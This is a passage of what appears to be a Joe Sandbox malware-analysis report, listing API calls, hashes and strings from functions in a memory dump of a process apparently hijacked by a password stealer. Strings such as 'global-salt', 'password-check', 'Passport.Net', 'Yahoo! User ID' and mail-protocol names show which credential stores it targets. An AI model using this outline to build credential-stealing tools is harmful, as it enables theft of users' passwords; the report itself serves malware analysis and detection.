                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                      • Opcode ID: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                      • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                      • API String ID: 2053021465-3671122194
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID: $no query solution
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
